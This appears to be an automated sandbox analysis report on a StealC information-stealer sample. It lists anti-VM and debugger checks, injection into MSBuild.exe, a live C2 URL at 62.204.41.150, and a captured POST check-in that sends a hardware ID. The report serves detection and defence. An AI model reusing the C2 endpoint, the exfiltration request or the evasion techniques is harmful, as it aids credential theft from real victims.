Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FE7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00FE7922

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_004045C0 VirtualProtect ?,00000004,00000100,00000000

3_2_004045C0

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE2003 mov edi, dword ptr fs:[00000030h]	0_2_00FE2003
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FFA64C mov eax, dword ptr fs:[00000030h]	0_2_00FFA64C
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_01026628 mov eax, dword ptr fs:[00000030h]	0_2_01026628
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FF0F2E mov ecx, dword ptr fs:[00000030h]	0_2_00FF0F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00419750 mov eax, dword ptr fs:[00000030h]	3_2_00419750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FFCC4B GetProcessHeap,

0_2_00FFCC4B

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00FE7610
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FE7922
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE7AAF SetUnhandledExceptionFilter,	0_2_00FE7AAF
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FEDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FEDA73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041AD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041CEEA SetUnhandledExceptionFilter,	3_2_0041CEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041B33A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory protected: page guard

Yara detected Powershell download and execute

HIPS / PFW / Operating System Protection Evasion

Source: Yara match	File source: Process Memory Space: 1f13Cs1ogc.exe PID: 6352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 65C000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A41008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00FFC085
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,	0_2_00FF622B
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: EnumSystemLocalesW,	0_2_00FFC372
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: EnumSystemLocalesW,	0_2_00FFC327
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00FFC498
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: EnumSystemLocalesW,	0_2_00FFC40D
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,	0_2_00FFC6EB
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00FFC814
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00FFC9E9
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,	0_2_00FFC91A
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: EnumSystemLocalesW,	0_2_00FF5D7F

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Queries volume information: C:\ VolumeInformation

AV process strings found (often used to terminate AV products)

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FE7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00FE7815

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00417850 GetUserNameA,

3_2_00417850

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.100dad8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.100dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Antivirus / Scanner detection for submitted sample

Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.100dad8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.100dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
62.204.41.150	unknown	United Kingdom		30798	TNNET-ASTNNetOyMainnetworkFI	true

Contacted Domains

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.214.172	true
s-part-0036.t-0009.t-msedge.net	13.107.246.64	true
fp2e7a.wpc.phicdn.net	192.229.221.95	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://62.204.41.150/	true		unknown
http://62.204.41.150/edd20096ecef326d.php	true		unknown

AV Detection

Source: 1f13Cs1ogc.exe

Avira: detected

Found malware configuration

Source: 3.2.MSBuild.exe.400000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"}

Multi AV Scanner detection for submitted file

Source: 1f13Cs1ogc.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 1f13Cs1ogc.exe

Joe Sandbox ML: detected

Uses insecure TLS / SSL version for HTTPS connection

Source: 1f13Cs1ogc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49713 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49752 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49746 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49740 version: TLS 1.2

Source: 1f13Cs1ogc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FF9ABF FindFirstFileExW,

Suricata IDS alerts for network traffic

Networking

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 62.204.41.150:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://62.204.41.150/edd20096ecef326d.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 33 39 42 45 35 35 44 37 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="hwid"4239BE55D7561166170430------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="build"default6_doz------GDGIJECGDGCBKECAKFBG--

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49713 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49752 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49746 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00406280 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

3_2_00406280

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache

Source: unknown

Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/bJ
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E64000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php5
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/j
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150t
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150~
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49740 version: TLS 1.2

Detected potential crypto function

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE2021	0_2_00FE2021
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE729C	0_2_00FE729C
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FFD39B	0_2_00FFD39B
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FF572C	0_2_00FF572C
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_0103094F	0_2_0103094F
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FECAF2	0_2_00FECAF2
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FFBB36	0_2_00FFBB36
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FF3C92	0_2_00FF3C92
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE1D79	0_2_00FE1D79
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FEFEF0	0_2_00FEFEF0

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: String function: 00FE7B80 appears 49 times

One or more processes crash

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288

Sample file is different than original file name gathered from version info

Source: 1f13Cs1ogc.exe, 00000000.00000000.2073157229.000000000105C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameproquota.exej% vs 1f13Cs1ogc.exe
Source: 1f13Cs1ogc.exe	Binary or memory string: OriginalFilenameproquota.exej% vs 1f13Cs1ogc.exe

Source: 1f13Cs1ogc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1f13Cs1ogc.exe

Static PE information: Section: .data ZLIB complexity 0.9899375

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/5@0/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\YWUXZ2ST.htm

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6352

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\768828e0-684a-4eb3-ba57-5c773a6c2dfb

Source: 1f13Cs1ogc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: 1f13Cs1ogc.exe

ReversingLabs: Detection: 31%

